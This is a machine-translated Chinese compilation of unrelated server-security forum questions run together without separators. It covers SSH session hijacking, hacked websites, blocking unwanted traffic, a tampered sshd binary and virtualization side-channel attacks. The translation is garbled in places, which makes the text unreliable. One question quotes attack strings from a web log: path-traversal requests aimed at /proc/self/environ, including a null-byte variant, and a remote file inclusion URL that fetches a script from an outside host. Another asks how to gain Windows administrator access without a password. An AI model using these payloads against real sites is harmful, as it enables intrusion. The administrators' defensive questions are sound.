我现在有点害怕。我正在通过 SSH 连接到我最近委托的远程服务器。我正在以 root 身份执行此操作。我已经安装了 fail2ban 并且在日志中有大量被禁止的 IP。
上次登录时,我注意到我的终端非常卡顿,然后我的互联网连接中断了。当我在大约 5 分钟后重新购买它时,我重新登录到服务器并做了一个“谁”并意识到有两个 root 用户登录。我本以为如果我的连接终止了上次会话的进程停在服务器上?
当我第一次断开连接时,连接以“写入失败:管道损坏”结束。我用另一个 root 终止了 bash 会话。我不太了解 ssh 安全性,但是会话会被劫持吗?有没有办法检查这个?我需要继续通过 ssh 登录,我应该采取什么预防措施?如果我以某种方式通过代理访问我的服务器(就像中间人攻击一样),他们会劫持我的 ssh 会话吗?
如果为您提供一台运行 Windows 2000 或更新版本的计算机并且您没有密码,您使用什么方法获得管理员权限的访问权限,以便您可以使用系统?
根据Internet Storm Center 的说法,那里似乎存在 SSH 零日漏洞。
这里有一些概念代码证明和一些参考:
这似乎是一个严重的问题,所以每个 Linux/Unix 系统管理员都应该小心。
如果这个问题不及时修补,我们如何保护自己?或者您通常如何处理零日漏洞?
*我会在回复中发布我的建议。
我的公司有一台托管在北美的 Google Compute Engine 服务器。我们有太多的中国 IP 地址向端口 11 发送请求,以至于我们要为入口花钱。我们的防火墙已经阻止了与中国的所有连接,因为他们无法访问我们的应用程序。
有没有办法完全忽略这些连接,或者以不会占用带宽的方式阻止它们?
firewall hacking china linux-networking google-compute-engine
破解他人拥有的真实系统是否合乎道德?不是为了盈利,而是为了测试您的安全知识并学习新的东西。我只说hack,不会对系统造成任何损害,只是证明存在一些安全漏洞。
可能重复:
我的服务器被黑了 紧急情况
上周末我公司的网站被黑了。
他们在周五晚上做了最好的事情,所以我们只在周一早上才注意到攻击。有趣的是,我们最近从 Windows 切换到 Linux,因为它应该更稳定和安全。去搞清楚。是的,我们在 Firefox 和 Chrome 上将我们列入黑名单。
由于我不是 Linux 专家,因此我正在寻求有关如何避免将来出现此类问题的建议。您采取了哪些措施来保护您的系统?看起来我们的密码很弱,但是在几次登录失败后,Linux 不应该阻止该帐户吗?他们尝试了 20 多种组合......
除此之外,我正在寻找一种类似于 pingdom 但适用于安全性的工具(或服务)。如果我的网站遭到黑客入侵,请提醒我。有这种事吗?黑客监视器?:)
另一件事,您如何将此类问题通知您的客户?你只是无视并希望没有人注意到吗?电子邮件解释发生了什么?
*以匿名身份发布以避免对我的公司造成更多不良影响,这已经很糟糕了...
查看我的 404 日志,我注意到以下两个 URL,它们都发生了一次:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
和
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
有问题的页面library.php需要一个type具有六个不同可接受值的id变量,然后是一个变量。所以一个有效的 URL 可能是
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
并且在mysql_real_escape_string用于查询数据库之前,所有id都经过了处理。
我是菜鸟,但在我看来这两个链接都是针对 webroot 的简单攻击?
1)除了 404 之外,如何最好地防止此类事情?
2)我是否应该永久禁止负责的 IP?
编辑:也刚刚注意到这个
/library.php=http://www.basfalt.no/scripts/danger.txt
编辑 2:所有 3 次攻击的违规 IP 都216.97.231.15追溯到位于洛杉矶郊外的名为 Lunar Pages 的 ISP。
编辑 3:我决定在当地时间周五早上致电 ISP,并与我可以通过电话联系的任何人讨论该问题。我会在 24 小时左右后在此处发布结果。
编辑 4:我最后给他们的管理员发了电子邮件,他们首先回复说“他们正在调查”,然后一天后回复“现在应该解决这个问题”。没有进一步的细节,很遗憾。
我正在运行一个小型(基于 Windows)的服务器。当我检查日志时,我看到源源不断的(不成功的)密码猜测黑客尝试。我应该尝试向源 IP 地址的所有者报告这些尝试,还是现在这些尝试被认为是完全正常的,无论如何没有人会费心做任何事情?
我在 ubuntu 10.10 机器上的 sshd 二进制文件包含以下 ascii 图稿:
ng: %.100sToo many lines in environment file %sUser %.100s not allowed because %s exists YOU WANNA .
SMOKE M A SPLIFF ?
dM
ROLL ME MMr %d TIMES
4MMML .
MMMMM. xf
. MMMMM .MM-
Mh.. MMMMMM .MMMM
.MMM. .MMMMML. MMMMMh
)MMMh. MMMMMM MMMMMMM
3MMMMx. MMMMMMf xnMMMMMM
'*MMMMM MMMMMM. nMMMMMMP
*MMMMMx MMMMM .MMMMMMM=
*MMMMMh MMMMM JMMMMMMP
MMMMMM 3MMMM. dMMMMMM .
MMMMMM MMMM .MMMMM .nnMP
.. *MMMMx MMM dMMMM .nnMMMMM*
MMn... 'MMMMr 'MM …我知道存在许多虚拟化类型/解决方案,并且可能有不同的弱点。但是,我主要是在寻找有关虚拟化技术的一般安全问题,而不是特定的供应商错误。
请提供真实的事实、(严肃的)研究、经历过的问题或技术解释。请明确点。不要(仅)发表您的意见。
两年前,我听说可能存在与MMU相关的安全问题(我认为访问其他机器的主内存),但我不知道这是否是今天的实际威胁,或者只是一项理论研究主题。
编辑:我还发现这种“刷新+重新加载”攻击能够通过利用 L3 CPU 缓存在同一台物理机器上检索 GnuPG 密钥,即使 GnuPG 运行在另一个VM 上。从那以后,GnuPG 就被打上了补丁。